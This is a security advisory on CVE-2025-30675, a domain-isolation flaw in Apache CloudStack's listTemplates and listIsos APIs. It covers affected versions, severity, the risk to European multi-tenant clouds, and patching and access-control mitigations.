CVE-2025-30675 is a medium-severity vulnerability in Apache CloudStack, an open-source cloud computing software platform widely used for deploying and managing large networks of virtual machines. The flaw lies in the access control mechanisms of the listTemplates and listIsos APIs. Specifically, a malicious Domain Admin or Resource Admin can exploit the vulnerability by specifying the 'domainid' parameter combined with the 'filter=self' or 'filter=selfexecutable' values. This manipulation causes the system to incorrectly resolve domain scope, defaulting to the ROOT domain rather than restricting visibility to the caller's authorized domain. Consequently, the attacker gains unauthorized access to metadata of templates and ISOs belonging to unrelated domains, violating domain isolation boundaries. This exposure can reveal sensitive or internal configuration details that should remain confidential within each domain. The vulnerability affects Apache CloudStack versions from 4.0.0 up to and including 4.20.0.0 and was addressed in versions 4.19.3.0 and 4.20.1.0 by enforcing strict domain resolution based on the caller's scope. The CVSS v3.1 base score is 4.7, reflecting low complexity exploitation (network vector, low attack complexity) but requiring high privileges (Domain or Resource Admin) and no user interaction. The impact includes confidentiality loss, integrity, and availability impacts due to potential misuse of exposed information. No known exploits are currently reported in the wild, but the vulnerability poses a risk in multi-tenant cloud environments where domain isolation is critical.

For European organizations utilizing Apache CloudStack, especially those operating multi-tenant cloud infrastructures or private clouds, this vulnerability undermines the fundamental security principle of domain isolation. Unauthorized access to templates and ISOs metadata can lead to exposure of sensitive configuration details, potentially facilitating further attacks such as targeted exploitation of known vulnerabilities in exposed templates or unauthorized resource provisioning. This may result in data leakage, compliance violations (e.g., GDPR concerns if sensitive data is indirectly exposed), and erosion of trust in cloud service security. Organizations in sectors with strict data protection requirements, such as finance, healthcare, and government, are particularly at risk. Additionally, the exposure could aid attackers in lateral movement within cloud environments, increasing the risk of broader compromise. Although exploitation requires elevated privileges, insider threats or compromised admin accounts could leverage this flaw to escalate access or gather intelligence on other tenants’ resources.

European organizations should prioritize upgrading Apache CloudStack to versions 4.19.3.0 or 4.20.1.0 or later, where the vulnerability is patched. Beyond patching, organizations should implement strict role-based access controls (RBAC) to limit the number of users with Domain Admin or Resource Admin privileges, reducing the attack surface. Regular audits of admin activities and domain configurations can help detect anomalous API usage patterns indicative of exploitation attempts. Network segmentation and monitoring of API calls related to template and ISO listings can provide early warning signs. Additionally, organizations should review and harden domain isolation policies and consider implementing additional logging and alerting for cross-domain access attempts. Employing multi-factor authentication (MFA) for admin accounts will reduce the risk of credential compromise. Finally, conducting security awareness training for cloud administrators about the risks of privilege misuse is recommended.